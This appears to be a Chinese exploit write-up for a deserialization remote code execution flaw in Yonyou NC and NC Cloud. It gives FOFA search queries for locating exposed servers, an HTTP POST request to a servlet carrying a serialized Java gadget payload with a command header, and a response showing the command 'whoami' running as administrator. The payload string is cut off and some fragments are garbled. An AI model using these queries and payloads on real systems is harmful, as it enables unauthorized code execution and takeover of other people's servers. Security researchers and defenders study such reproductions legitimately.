

Y8-18用友-NCCloud-反序列化RCE

漏洞描述:

用友 NC及NC Cloud 存在多处反序列化代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

网站图片:



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网络测绘:

fofa语法:

```
banner="nccloud" || header="nccloud" || (body="platform/yonyou-yyy.js" && body="platform/ca/nccsign.js") || body="window.location.href='platform/pub/welcome.do';" || (body="UFIDA" && body="logo/images/") || body="logo/images/ufida_nc.png" || title="Yonyou NC" || body=""
```

```
" || body="
```

漏洞复现:

payload:

```
POST /servlet/~uapim/nc.bs.pub.im.UserAuthenticationServlet HTTP/1.1
Host: your-ip
Cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 20434

{{unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x02?@\x00\x00\x00\x00\x01sr\x004org.apache.commons.cc
```

效果图:

[数据包扫描](#)
[热加载](#)
[构造请求](#)

[illegible]

美化

```
1 HTTP/1.1 200 OK
2 Server: Apache-Coyote/1.1
3 Set-Cookie: JSESSIONID=07FD41ADCCF9E48CCAS
4 Date: Sun, 17 Dec 2023 09:12:41 GMT
5 Content-Length: 230
6
7 win-vsfa0r519fk\administrator
8 java.util.HashMap
9 loadFactor: 0.75 threshold: 10
Boolean value: true
java.util.HashMap
```